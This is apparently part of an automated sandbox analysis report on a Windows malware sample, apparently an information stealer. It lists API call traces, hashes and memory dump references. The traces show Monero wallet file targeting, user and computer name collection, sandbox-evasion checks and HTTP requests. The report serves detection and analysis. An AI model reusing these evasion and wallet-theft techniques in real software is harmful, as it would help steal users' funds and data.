                                      • Part of subcall function 00941190: ExitProcess.KERNEL32 ref: 009411C6
                                      • Part of subcall function 00957850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                      • Part of subcall function 00957850: RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                      • Part of subcall function 00957850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                      • Part of subcall function 009578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                      • Part of subcall function 009578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                      • Part of subcall function 009578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00956AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00956AF9
                                    • Sleep.KERNEL32(00001770), ref: 00956B04
                                    • CloseHandle.KERNEL32(?,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956B1A
                                    • ExitProcess.KERNEL32 ref: 00956B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 784b431ac98947fab930fcd5b56666cea63e9d7a3f0b446a28d3c2429f39c890
                                    • Instruction ID: 100719dc766fa5b2f3349e8f3a3c5561010f6c666258d39da6664babeac57b85
                                    • Opcode Fuzzy Hash: 784b431ac98947fab930fcd5b56666cea63e9d7a3f0b446a28d3c2429f39c890
                                    • Instruction Fuzzy Hash: 08314570904108ABDB04F7F1DC56FEE7778AF84342F404619FA12A3191EF745949C7AA
                                    Function 00956AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 956af3 1437 956b0a 1436->1437 1439 956b0c-956b22 call 956920 call 955b10 CloseHandle ExitProcess 1437->1439 1440 956aba-956ad7 call 95aad0 OpenEventA 1437->1440 1446 956af5-956b04 CloseHandle Sleep 1440->1446 1447 956ad9-956af1 call 95aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00956AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00956AF9
                                    • Sleep.KERNEL32(00001770), ref: 00956B04
                                    • CloseHandle.KERNEL32(?,00000000,?,015E89C0,?,0096110C,?,00000000,?,00961110,?,00000000,00960AEF), ref: 00956B1A
                                    • ExitProcess.KERNEL32 ref: 00956B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: e6b934a49da9ee42d694f868e92f4757e40720c20dedcba420c4a70f545c0ff3
                                    • Instruction ID: 7d30ee9972da7c8c4d2b48ae44310cb1fc392f73f4ed810f77e2632f97b96dd6
                                    • Opcode Fuzzy Hash: e6b934a49da9ee42d694f868e92f4757e40720c20dedcba420c4a70f545c0ff3
                                    • Instruction Fuzzy Hash: 30F05E70944209ABF700EBA2DC1ABBD7B74EB44702F904915BD03A31E1DFB45948D766
                                    Function 009447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 4c67656f03ed8188d5a66f5d71fffa8d94fa3855b7a1832076bd371ee8f31916
                                    • Instruction ID: 37dbc37c4e4b75d7a71b56793ad2066dc3b7b86e00ca7b40e49c320d6f7c8ef4
                                    • Opcode Fuzzy Hash: 4c67656f03ed8188d5a66f5d71fffa8d94fa3855b7a1832076bd371ee8f31916
                                    • Instruction Fuzzy Hash: 46213BB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625FA25A7291EB706A0ACB91
                                    Function 009551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 00946280: InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                      • Part of subcall function 00946280: StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                      • Part of subcall function 00946280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                      • Part of subcall function 00946280: HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                      • Part of subcall function 00946280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                      • Part of subcall function 00946280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 51bf40492d3685b93ee5c65bac23114523c9120efb087d7fce48a96c3bae5f7d
                                    • Instruction ID: e8f7cf8e8ce82881293861c48b7f77897106fa9efb991504127657dbe1a9bdeb
                                    • Opcode Fuzzy Hash: 51bf40492d3685b93ee5c65bac23114523c9120efb087d7fce48a96c3bae5f7d
                                    • Instruction Fuzzy Hash: 5B112E30900008ABCB14FF61DD52FED7738AF90301F808658FD1A4A192EF34AB09C79A
                                    Function 00941220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 941220-941247 call 9589b0 GlobalMemoryStatusEx 1496 941273-94127a 1493->1496 1497 941249-941271 call 95da00 * 2 1493->1497 1498 941281-941285 1496->1498 1497->1498 1501 941287 1498->1501 1502 94129a-94129d 1498->1502 1504 941292-941294 ExitProcess 1501->1504 1505 941289-941290 1501->1505 1505->1502 1505->1504
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0094123E
                                    • ExitProcess.KERNEL32 ref: 00941294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 795b0981d067f2c96c01d2aa60a064a0dad2901b178631fc9ac8fe55dca338cc
                                    • Instruction ID: d9c993d1548475aa24b4937bbe4007f135bda869c925747dcb37309109b9864a
                                    • Opcode Fuzzy Hash: 795b0981d067f2c96c01d2aa60a064a0dad2901b178631fc9ac8fe55dca338cc
                                    • Instruction Fuzzy Hash: A40112B0D44308BBEB10DBD4CC49F9EB778AB54705F208155E715F61C0D7B45585CB99
                                    Function 00941110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0094112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00941132
                                    • ExitProcess.KERNEL32 ref: 00941143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: c882b516f88315ac8824b9934037e62b1b93237431e402e835f5a8a545bf93df
                                    • Instruction ID: 21524b71ef214b55ac1afac47deedec24d85fea7e6ed63d6ad9e19eff83adadb
                                    • Opcode Fuzzy Hash: c882b516f88315ac8824b9934037e62b1b93237431e402e835f5a8a545bf93df
                                    • Instruction Fuzzy Hash: 06E0E670945308FBF710ABA09C0AF097678AB04B41F104155F709771D0DAB52A40D7AA
                                    Function 009410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009410B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009410F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 9fc1f212256411a030567a6bf344448cdde74ccc7fb0e3879fc8a7405013281e
                                    • Instruction ID: d2d36b5abd75dd83efc0b6a01767ef20b1d4885bed8d4e749b8b641c85c0a650
                                    • Opcode Fuzzy Hash: 9fc1f212256411a030567a6bf344448cdde74ccc7fb0e3879fc8a7405013281e
                                    • Instruction Fuzzy Hash: 64F0E271641208BBE7149AA4AC59FABB7ECE705B15F300848F904E3290D9719E40DBA0
                                    Function 00941190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                      • Part of subcall function 009578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                      • Part of subcall function 009578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                      • Part of subcall function 00957850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                      • Part of subcall function 00957850: RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                      • Part of subcall function 00957850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                    • ExitProcess.KERNEL32 ref: 009411C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 594b5ffc35a073ae6f552334d19d6341933e7dcc465e543937091abaab67fbec
                                    • Instruction ID: 2ab2c92ad2de74581fe8142f6d089feb4dc74104d29516629d6c35658f82e44b
                                    • Opcode Fuzzy Hash: 594b5ffc35a073ae6f552334d19d6341933e7dcc465e543937091abaab67fbec
                                    • Instruction Fuzzy Hash: 79E0ECB591420153DA00B3B2BC4AB2A369C5B54346F040425FE0593112FE29E944C76A

                                    Non-executed Functions

                                    Function 009538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 009538CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 009538E3
                                    • lstrcat.KERNEL32(?,?), ref: 00953935
                                    • StrCmpCA.SHLWAPI(?,00960F70), ref: 00953947
                                    • StrCmpCA.SHLWAPI(?,00960F74), ref: 0095395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00953C67
                                    • FindClose.KERNEL32(000000FF), ref: 00953C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 42e32462862c579ca487b79fd4525059c240ab989e15e47a1c484716655f2ece
                                    • Instruction ID: fc607a8c36e72ff90d6c1011c638a33e0b1abb3acddf10f17f8ef378b880ff6f
                                    • Opcode Fuzzy Hash: 42e32462862c579ca487b79fd4525059c240ab989e15e47a1c484716655f2ece
                                    • Instruction Fuzzy Hash: 96A121B1A002189BDB24DF65DC85FEE737CBB88301F048589BA4D97151EB759B88CF62
                                    Function 0094BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00960B32,00960B2B,00000000,?,?,?,009613F4,00960B2A), ref: 0094BEF5
